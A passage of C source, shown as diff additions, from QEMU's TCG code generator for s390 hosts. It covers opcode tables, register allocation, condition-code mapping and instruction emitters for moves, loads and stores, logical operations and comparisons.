0xb997, + RRE_DSGFR = 0xb91d, + RRE_DSGR = 0xb90d, + RRE_LGBR = 0xb906, + RRE_LCGR = 0xb903, + RRE_LGFR = 0xb914, + RRE_LGHR = 0xb907, + RRE_LGR = 0xb904, + RRE_LLGCR = 0xb984, + RRE_LLGFR = 0xb916, + RRE_LLGHR = 0xb985, + RRE_LRVR = 0xb91f, + RRE_LRVGR = 0xb90f, + RRE_LTGR = 0xb902, + RRE_MLGR = 0xb986, + RRE_MSGR = 0xb90c, + RRE_MSR = 0xb252, + RRE_NGR = 0xb980, + RRE_OGR = 0xb981, + RRE_SGR = 0xb909, + RRE_SLGR = 0xb90b, + RRE_SLBR = 0xb999, + RRE_SLBGR = 0xb989, + RRE_XGR = 0xb982, + + RRF_LOCR = 0xb9f2, + RRF_LOCGR = 0xb9e2, + + RR_AR = 0x1a, + RR_ALR = 0x1e, + RR_BASR = 0x0d, + RR_BCR = 0x07, + RR_CLR = 0x15, + RR_CR = 0x19, + RR_DR = 0x1d, + RR_LCR = 0x13, + RR_LR = 0x18, + RR_LTR = 0x12, + RR_NR = 0x14, + RR_OR = 0x16, + RR_SR = 0x1b, + RR_SLR = 0x1f, + RR_XR = 0x17, + + RSY_RLL = 0xeb1d, + RSY_RLLG = 0xeb1c, + RSY_SLLG = 0xeb0d, + RSY_SRAG = 0xeb0a, + RSY_SRLG = 0xeb0c, + + RS_SLL = 0x89, + RS_SRA = 0x8a, + RS_SRL = 0x88, + + RXY_AG = 0xe308, + RXY_AY = 0xe35a, + RXY_CG = 0xe320, + RXY_CY = 0xe359, + RXY_LAY = 0xe371, + RXY_LB = 0xe376, + RXY_LG = 0xe304, + RXY_LGB = 0xe377, + RXY_LGF = 0xe314, + RXY_LGH = 0xe315, + RXY_LHY = 0xe378, + RXY_LLGC = 0xe390, + RXY_LLGF = 0xe316, + RXY_LLGH = 0xe391, + RXY_LMG = 0xeb04, + RXY_LRV = 0xe31e, + RXY_LRVG = 0xe30f, + RXY_LRVH = 0xe31f, + RXY_LY = 0xe358, + RXY_STCY = 0xe372, + RXY_STG = 0xe324, + RXY_STHY = 0xe370, + RXY_STMG = 0xeb24, + RXY_STRV = 0xe33e, + RXY_STRVG = 0xe32f, + RXY_STRVH = 0xe33f, + RXY_STY = 0xe350, + + RX_A = 0x5a, + RX_C = 0x59, + RX_L = 0x58, + RX_LA = 0x41, + RX_LH = 0x48, + RX_ST = 0x50, + RX_STC = 0x42, + RX_STH = 0x40, +} S390Opcode; + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", + "%r8", "%r9", "%r10" "%r11" "%r12" "%r13" "%r14" "%r15" +}; +#endif + +/* Since R6 is a potential argument register, choose it last of the + call-saved registers. Likewise prefer the call-clobbered registers + in reverse order to maximize the chance of avoiding the arguments. */ +static const int tcg_target_reg_alloc_order[] = { + /* Call saved registers. */ + TCG_REG_R13, + TCG_REG_R12, + TCG_REG_R11, + TCG_REG_R10, + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_R7, + TCG_REG_R6, + /* Call clobbered registers. */ + TCG_REG_R14, + TCG_REG_R0, + TCG_REG_R1, + /* Argument registers, in reverse order of allocation. */ + TCG_REG_R5, + TCG_REG_R4, + TCG_REG_R3, + TCG_REG_R2, +}; + +static const int tcg_target_call_iarg_regs[] = { + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R2, +}; + +#define S390_CC_EQ 8 +#define S390_CC_LT 4 +#define S390_CC_GT 2 +#define S390_CC_OV 1 +#define S390_CC_NE (S390_CC_LT | S390_CC_GT) +#define S390_CC_LE (S390_CC_LT | S390_CC_EQ) +#define S390_CC_GE (S390_CC_GT | S390_CC_EQ) +#define S390_CC_NEVER 0 +#define S390_CC_ALWAYS 15 + +/* Condition codes that result from a COMPARE and COMPARE LOGICAL. */ +static const uint8_t tcg_cond_to_s390_cond[] = { + [TCG_COND_EQ] = S390_CC_EQ, + [TCG_COND_NE] = S390_CC_NE, + [TCG_COND_LT] = S390_CC_LT, + [TCG_COND_LE] = S390_CC_LE, + [TCG_COND_GT] = S390_CC_GT, + [TCG_COND_GE] = S390_CC_GE, + [TCG_COND_LTU] = S390_CC_LT, + [TCG_COND_LEU] = S390_CC_LE, + [TCG_COND_GTU] = S390_CC_GT, + [TCG_COND_GEU] = S390_CC_GE, +}; + +/* Condition codes that result from a LOAD AND TEST. Here, we have no + unsigned instruction variation, however since the test is vs zero we + can re-map the outcomes appropriately. */ +static const uint8_t tcg_cond_to_ltr_cond[] = { + [TCG_COND_EQ] = S390_CC_EQ, + [TCG_COND_NE] = S390_CC_NE, + [TCG_COND_LT] = S390_CC_LT, + [TCG_COND_LE] = S390_CC_LE, + [TCG_COND_GT] = S390_CC_GT, + [TCG_COND_GE] = S390_CC_GE, + [TCG_COND_LTU] = S390_CC_NEVER, + [TCG_COND_LEU] = S390_CC_EQ, + [TCG_COND_GTU] = S390_CC_NE, + [TCG_COND_GEU] = S390_CC_ALWAYS, +}; + +#ifdef CONFIG_SOFTMMU +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LESL] = helper_le_ldsl_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BESL] = helper_be_ldsl_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; +#endif + +static tcg_insn_unit *tb_ret_addr; + +/* A list of relevant facilities used by this translator. Some of these + are required for proper operation, and these are checked at startup. */ + +#define FACILITY_ZARCH_ACTIVE (1ULL << (63 - 2)) +#define FACILITY_LONG_DISP (1ULL << (63 - 18)) +#define FACILITY_EXT_IMM (1ULL << (63 - 21)) +#define FACILITY_GEN_INST_EXT (1ULL << (63 - 34)) +#define FACILITY_LOAD_ON_COND (1ULL << (63 - 45)) + +static uint64_t facilities; + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + intptr_t pcrel2 = (tcg_insn_unit *)value - (code_ptr - 1); + assert(addend == -2); + + switch (type) { + case R_390_PC16DBL: + assert(pcrel2 == (int16_t)pcrel2); + tcg_patch16(code_ptr, pcrel2); + break; + case R_390_PC32DBL: + assert(pcrel2 == (int32_t)pcrel2); + tcg_patch32(code_ptr, pcrel2); + break; + default: + tcg_abort(); + break; + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str = *pct_str; + + switch (ct_str[0]) { + case 'r': /* all registers */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + break; + case 'R': /* not R0 */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); + break; + case 'L': /* qemu_ld/st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffff); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R2); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R3); + tcg_regset_reset_reg (ct->u.regs, TCG_REG_R4); + break; + case 'a': /* force R2 for division */ + ct->ct |= TCG_CT_REG; + tcg_regset_clear(ct->u.regs); + tcg_regset_set_reg(ct->u.regs, TCG_REG_R2); + break; + case 'b': /* force R3 for division */ + ct->ct |= TCG_CT_REG; + tcg_regset_clear(ct->u.regs); + tcg_regset_set_reg(ct->u.regs, TCG_REG_R3); + break; + case 'A': + ct->ct |= TCG_CT_CONST_ADLI; + break; + case 'K': + ct->ct |= TCG_CT_CONST_MULI; + break; + case 'O': + ct->ct |= TCG_CT_CONST_ORI; + break; + case 'X': + ct->ct |= TCG_CT_CONST_XORI; + break; + case 'C': + ct->ct |= TCG_CT_CONST_CMPI; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + + return 0; +} + +/* Immediates to be used with logical OR. This is an optimization only, + since a full 64-bit immediate OR can always be performed with 4 sequential + OI[LH][LH] instructions. What we're looking for is immediates that we + can load efficiently, and the immediate load plus the reg-reg OR is + smaller than the sequential OI's. */ + +static int tcg_match_ori(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + if (type == TCG_TYPE_I32) { + /* All 32-bit ORs can be performed with 1 48-bit insn. */ + return 1; + } + } + + /* Look for negative values. These are best to load with LGHI. */ + if (val < 0) { + if (val == (int16_t)val) { + return 0; + } + if (facilities & FACILITY_EXT_IMM) { + if (val == (int32_t)val) { + return 0; + } + } + } + + return 1; +} + +/* Immediates to be used with logical XOR. This is almost, but not quite, + only an optimization. XOR with immediate is only supported with the + extended-immediate facility. That said, there are a few patterns for + which it is better to load the value into a register first. */ + +static int tcg_match_xori(TCGType type, tcg_target_long val) +{ + if ((facilities & FACILITY_EXT_IMM) == 0) { + return 0; + } + + if (type == TCG_TYPE_I32) { + /* All 32-bit XORs can be performed with 1 48-bit insn. */ + return 1; + } + + /* Look for negative values. These are best to load with LGHI. */ + if (val < 0 && val == (int32_t)val) { + return 0; + } + + return 1; +} + +/* Imediates to be used with comparisons. */ + +static int tcg_match_cmpi(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + /* The COMPARE IMMEDIATE instruction is available. */ + if (type == TCG_TYPE_I32) { + /* We have a 32-bit immediate and can compare against anything. */ + return 1; + } else { + /* ??? We have no insight here into whether the comparison is + signed or unsigned. The COMPARE IMMEDIATE insn uses a 32-bit + signed immediate, and the COMPARE LOGICAL IMMEDIATE insn uses + a 32-bit unsigned immediate. If we were to use the (semi) + obvious "val == (int32_t)val" we would be enabling unsigned + comparisons vs very large numbers. The only solution is to + take the intersection of the ranges. */ + /* ??? Another possible solution is to simply lie and allow all + constants here and force the out-of-range values into a temp + register in tgen_cmp when we have knowledge of the actual + comparison code in use. */ + return val >= 0 && val <= 0x7fffffff; + } + } else { + /* Only the LOAD AND TEST instruction is available. */ + return val == 0; + } +} + +/* Immediates to be used with add2/sub2. */ + +static int tcg_match_add2i(TCGType type, tcg_target_long val) +{ + if (facilities & FACILITY_EXT_IMM) { + if (type == TCG_TYPE_I32) { + return 1; + } else if (val >= -0xffffffffll && val <= 0xffffffffll) { + return 1; + } + } + return 0; +} + +/* Test if a constant matches the constraint. */ +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + /* The following are mutually exclusive. */ + if (ct & TCG_CT_CONST_MULI) { + /* Immediates that may be used with multiply. If we have the + general-instruction-extensions, then we have MULTIPLY SINGLE + IMMEDIATE with a signed 32-bit, otherwise we have only + MULTIPLY HALFWORD IMMEDIATE, with a signed 16-bit. */ + if (facilities & FACILITY_GEN_INST_EXT) { + return val == (int32_t)val; + } else { + return val == (int16_t)val; + } + } else if (ct & TCG_CT_CONST_ADLI) { + return tcg_match_add2i(type, val); + } else if (ct & TCG_CT_CONST_ORI) { + return tcg_match_ori(type, val); + } else if (ct & TCG_CT_CONST_XORI) { + return tcg_match_xori(type, val); + } else if (ct & TCG_CT_CONST_CMPI) { + return tcg_match_cmpi(type, val); + } + + return 0; +} + +/* Emit instructions according to the given instruction format. */ + +static void tcg_out_insn_RR(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) +{ + tcg_out16(s, (op << 8) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RRE(TCGContext *s, S390Opcode op, + TCGReg r1, TCGReg r2) +{ + tcg_out32(s, (op << 16) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RRF(TCGContext *s, S390Opcode op, + TCGReg r1, TCGReg r2, int m3) +{ + tcg_out32(s, (op << 16) | (m3 << 12) | (r1 << 4) | r2); +} + +static void tcg_out_insn_RI(TCGContext *s, S390Opcode op, TCGReg r1, int i2) +{ + tcg_out32(s, (op << 16) | (r1 << 20) | (i2 & 0xffff)); +} + +static void tcg_out_insn_RIL(TCGContext *s, S390Opcode op, TCGReg r1, int i2) +{ + tcg_out16(s, op | (r1 << 4)); + tcg_out32(s, i2); +} + +static void tcg_out_insn_RS(TCGContext *s, S390Opcode op, TCGReg r1, + TCGReg b2, TCGReg r3, int disp) +{ + tcg_out32(s, (op << 24) | (r1 << 20) | (r3 << 16) | (b2 << 12) + | (disp & 0xfff)); +} + +static void tcg_out_insn_RSY(TCGContext *s, S390Opcode op, TCGReg r1, + TCGReg b2, TCGReg r3, int disp) +{ + tcg_out16(s, (op & 0xff00) | (r1 << 4) | r3); + tcg_out32(s, (op & 0xff) | (b2 << 28) + | ((disp & 0xfff) << 16) | ((disp & 0xff000) >> 4)); +} + +#define tcg_out_insn_RX tcg_out_insn_RS +#define tcg_out_insn_RXY tcg_out_insn_RSY + +/* Emit an opcode with "type-checking" of the format. */ +#define tcg_out_insn(S, FMT, OP, ...) \ + glue(tcg_out_insn_,FMT)(S, glue(glue(FMT,_),OP), ## __VA_ARGS__) + + +/* emit 64-bit shifts */ +static void tcg_out_sh64(TCGContext* s, S390Opcode op, TCGReg dest, + TCGReg src, TCGReg sh_reg, int sh_imm) +{ + tcg_out_insn_RSY(s, op, dest, sh_reg, src, sh_imm); +} + +/* emit 32-bit shifts */ +static void tcg_out_sh32(TCGContext* s, S390Opcode op, TCGReg dest, + TCGReg sh_reg, int sh_imm) +{ + tcg_out_insn_RS(s, op, dest, sh_reg, 0, sh_imm); +} + +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) +{ + if (src != dst) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, LR, dst, src); + } else { + tcg_out_insn(s, RRE, LGR, dst, src); + } + } +} + +/* load a register with an immediate value */ +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long sval) +{ + static const S390Opcode lli_insns[4] = { + RI_LLILL, RI_LLILH, RI_LLIHL, RI_LLIHH + }; + + tcg_target_ulong uval = sval; + int i; + + if (type == TCG_TYPE_I32) { + uval = (uint32_t)sval; + sval = (int32_t)sval; + } + + /* Try all 32-bit insns that can load it in one go. */ + if (sval >= -0x8000 && sval < 0x8000) { + tcg_out_insn(s, RI, LGHI, ret, sval); + return; + } + + for (i = 0; i < 4; i++) { + tcg_target_long mask = 0xffffull << i*16; + if ((uval & mask) == uval) { + tcg_out_insn_RI(s, lli_insns[i], ret, uval >> i*16); + return; + } + } + + /* Try all 48-bit insns that can load it in one go. */ + if (facilities & FACILITY_EXT_IMM) { + if (sval == (int32_t)sval) { + tcg_out_insn(s, RIL, LGFI, ret, sval); + return; + } + if (uval <= 0xffffffff) { + tcg_out_insn(s, RIL, LLILF, ret, uval); + return; + } + if ((uval & 0xffffffff) == 0) { + tcg_out_insn(s, RIL, LLIHF, ret, uval >> 31 >> 1); + return; + } + } + + /* Try for PC-relative address load. */ + if ((sval & 1) == 0) { + ptrdiff_t off = tcg_pcrel_diff(s, (void *)sval) >> 1; + if (off == (int32_t)off) { + tcg_out_insn(s, RIL, LARL, ret, off); + return; + } + } + + /* If extended immediates are not present, then we may have to issue + several instructions to load the low 32 bits. */ + if (!(facilities & FACILITY_EXT_IMM)) { + /* A 32-bit unsigned value can be loaded in 2 insns. And given + that the lli_insns loop above did not succeed, we know that + both insns are required. */ + if (uval <= 0xffffffff) { + tcg_out_insn(s, RI, LLILL, ret, uval); + tcg_out_insn(s, RI, IILH, ret, uval >> 16); + return; + } + + /* If all high bits are set, the value can be loaded in 2 or 3 insns. + We first want to make sure that all the high bits get set. With + luck the low 16-bits can be considered negative to perform that for + free, otherwise we load an explicit -1. */ + if (sval >> 31 >> 1 == -1) { + if (uval & 0x8000) { + tcg_out_insn(s, RI, LGHI, ret, uval); + } else { + tcg_out_insn(s, RI, LGHI, ret, -1); + tcg_out_insn(s, RI, IILL, ret, uval); + } + tcg_out_insn(s, RI, IILH, ret, uval >> 16); + return; + } + } + + /* If we get here, both the high and low parts have non-zero bits. */ + + /* Recurse to load the lower 32-bits. */ + tcg_out_movi(s, TCG_TYPE_I64, ret, uval & 0xffffffff); + + /* Insert data into the high 32-bits. */ + uval = uval >> 31 >> 1; + if (facilities & FACILITY_EXT_IMM) { + if (uval < 0x10000) { + tcg_out_insn(s, RI, IIHL, ret, uval); + } else if ((uval & 0xffff) == 0) { + tcg_out_insn(s, RI, IIHH, ret, uval >> 16); + } else { + tcg_out_insn(s, RIL, IIHF, ret, uval); + } + } else { + if (uval & 0xffff) { + tcg_out_insn(s, RI, IIHL, ret, uval); + } + if (uval & 0xffff0000) { + tcg_out_insn(s, RI, IIHH, ret, uval >> 16); + } + } +} + + +/* Emit a load/store type instruction. Inputs are: + DATA: The register to be loaded or stored. + BASE+OFS: The effective address. + OPC_RX: If the operation has an RX format opcode (e.g. STC), otherwise 0. + OPC_RXY: The RXY format opcode for the operation (e.g. STCY). */ + +static void tcg_out_mem(TCGContext *s, S390Opcode opc_rx, S390Opcode opc_rxy, + TCGReg data, TCGReg base, TCGReg index, + tcg_target_long ofs) +{ + if (ofs < -0x80000 || ofs >= 0x80000) { + /* Combine the low 20 bits of the offset with the actual load insn; + the high 44 bits must come from an immediate load. */ + tcg_target_long low = ((ofs & 0xfffff) ^ 0x80000) - 0x80000; + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - low); + ofs = low; + + /* If we were already given an index register, add it in. */ + if (index != TCG_REG_NONE) { + tcg_out_insn(s, RRE, AGR, TCG_TMP0, index); + } + index = TCG_TMP0; + } + + if (opc_rx && ofs >= 0 && ofs < 0x1000) { + tcg_out_insn_RX(s, opc_rx, data, base, index, ofs); + } else { + tcg_out_insn_RXY(s, opc_rxy, data, base, index, ofs); + } +} + + +/* load data without address translation or endianness conversion */ +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg data, + TCGReg base, intptr_t ofs) +{ + if (type == TCG_TYPE_I32) { + tcg_out_mem(s, RX_L, RXY_LY, data, base, TCG_REG_NONE, ofs); + } else { + tcg_out_mem(s, 0, RXY_LG, data, base, TCG_REG_NONE, ofs); + } +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg data, + TCGReg base, intptr_t ofs) +{ + if (type == TCG_TYPE_I32) { + tcg_out_mem(s, RX_ST, RXY_STY, data, base, TCG_REG_NONE, ofs); + } else { + tcg_out_mem(s, 0, RXY_STG, data, base, TCG_REG_NONE, ofs); + } +} + +/* load data from an absolute host address */ +static void tcg_out_ld_abs(TCGContext *s, TCGType type, TCGReg dest, void *abs) +{ + intptr_t addr = (intptr_t)abs; + + if ((facilities & FACILITY_GEN_INST_EXT) && !(addr & 1)) { + ptrdiff_t disp = tcg_pcrel_diff(s, abs) >> 1; + if (disp == (int32_t)disp) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, LRL, dest, disp); + } else { + tcg_out_insn(s, RIL, LGRL, dest, disp); + } + return; + } + } + + tcg_out_movi(s, TCG_TYPE_PTR, dest, addr & ~0xffff); + tcg_out_ld(s, type, dest, dest, addr & 0xffff); +} + +static inline void tcg_out_risbg(TCGContext *s, TCGReg dest, TCGReg src, + int msb, int lsb, int ofs, int z) +{ + /* Format RIE-f */ + tcg_out16(s, (RIE_RISBG & 0xff00) | (dest << 4) | src); + tcg_out16(s, (msb << 8) | (z << 7) | lsb); + tcg_out16(s, (ofs << 8) | (RIE_RISBG & 0xff)); +} + +static void tgen_ext8s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LGBR, dest, src); + return; + } + + if (type == TCG_TYPE_I32) { + if (dest == src) { + tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 24); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 24); + } + tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 24); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 56); + tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 56); + } +} + +static void tgen_ext8u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LLGCR, dest, src); + return; + } + + if (dest == src) { + tcg_out_movi(s, type, TCG_TMP0, 0xff); + src = TCG_TMP0; + } else { + tcg_out_movi(s, type, dest, 0xff); + } + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, src); + } else { + tcg_out_insn(s, RRE, NGR, dest, src); + } +} + +static void tgen_ext16s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LGHR, dest, src); + return; + } + + if (type == TCG_TYPE_I32) { + if (dest == src) { + tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 16); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 16); + } + tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 16); + } else { + tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 48); + tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 48); + } +} + +static void tgen_ext16u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) +{ + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RRE, LLGHR, dest, src); + return; + } + + if (dest == src) { + tcg_out_movi(s, type, TCG_TMP0, 0xffff); + src = TCG_TMP0; + } else { + tcg_out_movi(s, type, dest, 0xffff); + } + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, src); + } else { + tcg_out_insn(s, RRE, NGR, dest, src); + } +} + +static inline void tgen_ext32s(TCGContext *s, TCGReg dest, TCGReg src) +{ + tcg_out_insn(s, RRE, LGFR, dest, src); +} + +static inline void tgen_ext32u(TCGContext *s, TCGReg dest, TCGReg src) +{ + tcg_out_insn(s, RRE, LLGFR, dest, src); +} + +/* Accept bit patterns like these: + 0....01....1 + 1....10....0 + 1..10..01..1 + 0..01..10..0 + Copied from gcc sources. */ +static inline bool risbg_mask(uint64_t c) +{ + uint64_t lsb; + /* We don't change the number of transitions by inverting, + so make sure we start with the LSB zero. */ + if (c & 1) { + c = ~c; + } + /* Reject all zeros or all ones. */ + if (c == 0) { + return false; + } + /* Find the first transition. */ + lsb = c & -c; + /* Invert to look for a second transition. */ + c = ~c; + /* Erase the first transition. */ + c &= -lsb; + /* Find the second transition, if any. */ + lsb = c & -c; + /* Match if all the bits are 1's, or if c is zero. */ + return c == -lsb; +} + +static void tgen_andi_risbg(TCGContext *s, TCGReg out, TCGReg in, uint64_t val) +{ + int msb, lsb; + if ((val & 0x8000000000000001ull) == 0x8000000000000001ull) { + /* Achieve wraparound by swapping msb and lsb. */ + msb = 64 - ctz64(~val); + lsb = clz64(~val) - 1; + } else { + msb = clz64(val); + lsb = 63 - ctz64(val); + } + tcg_out_risbg(s, out, in, msb, lsb, 0, 1); +} + +static void tgen_andi(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) +{ + static const S390Opcode ni_insns[4] = { + RI_NILL, RI_NILH, RI_NIHL, RI_NIHH + }; + static const S390Opcode nif_insns[2] = { + RIL_NILF, RIL_NIHF + }; + uint64_t valid = (type == TCG_TYPE_I32 ? 0xffffffffull : -1ull); + int i; + + /* Look for the zero-extensions. */ + if ((val & valid) == 0xffffffff) { + tgen_ext32u(s, dest, dest); + return; + } + if (facilities & FACILITY_EXT_IMM) { + if ((val & valid) == 0xff) { + tgen_ext8u(s, TCG_TYPE_I64, dest, dest); + return; + } + if ((val & valid) == 0xffff) { + tgen_ext16u(s, TCG_TYPE_I64, dest, dest); + return; + } + } + + /* Try all 32-bit insns that can perform it in one go. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = ~(0xffffull << i*16); + if (((val | ~valid) & mask) == mask) { + tcg_out_insn_RI(s, ni_insns[i], dest, val >> i*16); + return; + } + } + + /* Try all 48-bit insns that can perform it in one go. */ + if (facilities & FACILITY_EXT_IMM) { + for (i = 0; i < 2; i++) { + tcg_target_ulong mask = ~(0xffffffffull << i*32); + if (((val | ~valid) & mask) == mask) { + tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); + return; + } + } + } + if ((facilities & FACILITY_GEN_INST_EXT) && risbg_mask(val)) { + tgen_andi_risbg(s, dest, dest, val); + return; + } + + /* Fall back to loading the constant. */ + tcg_out_movi(s, type, TCG_TMP0, val); + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, NR, dest, TCG_TMP0); + } else { + tcg_out_insn(s, RRE, NGR, dest, TCG_TMP0); + } +} + +static void tgen64_ori(TCGContext *s, TCGReg dest, tcg_target_ulong val) +{ + static const S390Opcode oi_insns[4] = { + RI_OILL, RI_OILH, RI_OIHL, RI_OIHH + }; + static const S390Opcode nif_insns[2] = { + RIL_OILF, RIL_OIHF + }; + + int i; + + /* Look for no-op. */ + if (val == 0) { + return; + } + + if (facilities & FACILITY_EXT_IMM) { + /* Try all 32-bit insns that can perform it in one go. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = (0xffffull << i*16); + if ((val & mask) != 0 && (val & ~mask) == 0) { + tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); + return; + } + } + + /* Try all 48-bit insns that can perform it in one go. */ + for (i = 0; i < 2; i++) { + tcg_target_ulong mask = (0xffffffffull << i*32); + if ((val & mask) != 0 && (val & ~mask) == 0) { + tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); + return; + } + } + + /* Perform the OR via sequential modifications to the high and + low parts. Do this via recursion to handle 16-bit vs 32-bit + masks in each half. */ + tgen64_ori(s, dest, val & 0x00000000ffffffffull); + tgen64_ori(s, dest, val & 0xffffffff00000000ull); + } else { + /* With no extended-immediate facility, we don't need to be so + clever. Just iterate over the insns and mask in the constant. */ + for (i = 0; i < 4; i++) { + tcg_target_ulong mask = (0xffffull << i*16); + if ((val & mask) != 0) { + tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); + } + } + } +} + +static void tgen64_xori(TCGContext *s, TCGReg dest, tcg_target_ulong val) +{ + /* Perform the xor by parts. */ + if (val & 0xffffffff) { + tcg_out_insn(s, RIL, XILF, dest, val); + } + if (val > 0xffffffff) { + tcg_out_insn(s, RIL, XIHF, dest, val >> 31 >> 1); + } +} + +static int tgen_cmp(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, + TCGArg c2, int c2const) +{ + bool is_unsigned = is_unsigned_cond(c); + if (c2const) { + if (c2 == 0) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, LTR, r1, r1); + } else { + tcg_out_insn(s, RRE, LTGR, r1, r1); + } + return tcg_cond_to_ltr_cond[c]; + } else { + if (is_unsigned) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, CLFI, r1, c2); + } else { + tcg_out_insn(s, RIL, CLGFI, r1, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, CFI, r1, c2); + } else { + tcg_out_insn(s, RIL, CGFI, r1, c2); + } + } + } + } else { + if (is_unsigned) { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, CLR, r1, c2); + } else { + tcg_out_insn(s, RRE, CLGR, r1, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, CR, r1, c2); + } else { + tcg_out_insn(s, RRE, CGR, r1, c2); + } + } + } + return tcg_cond_to_s390_cond[c]; +} + +static void tgen_setcond(TCGContext *s, TCGType type, TCGCond cond, + TCGReg dest, TCGReg c1, TCGArg c2, int c2const) +{ + int cc; + + switch (cond) { + case TCG_COND_GTU: + case TCG_COND_GT: + do_greater: + /* The result of a compare has CC=2 for GT and CC=3 unused. + ADD LOGICAL WITH CARRY considers (CC & 2) the carry bit. */ + tgen_cmp(s, type, cond, c1, c2, c2const); + tcg_out_movi(s, type, dest, 0); + tcg_out_insn(s, RRE, ALCGR, dest, dest); + return; + + case TCG_COND_GEU: + do_geu: + /* We need "real" carry semantics, so use SUBTRACT LOGICAL + instead of COMPARE LOGICAL. This needs an extra move. */ + tcg_out_mov(s, type, TCG_TMP0, c1); + if (c2const) { + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RIL, SLFI, TCG_TMP0, c2); + } else { + tcg_out_insn(s, RIL, SLGFI, TCG_TMP0, c2); + } + } else { + if (type == TCG_TYPE_I32) { + tcg_out_insn(s, RR, SLR, TCG_TMP0, c2); + } else { + tcg_out_insn(s, RRE, SLGR, TCG_TMP0, c2); + } + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + } + tcg_out_insn(s, RRE, ALCGR, dest, dest); + return; + + case TCG_COND_LEU: + case TCG_COND_LTU: + 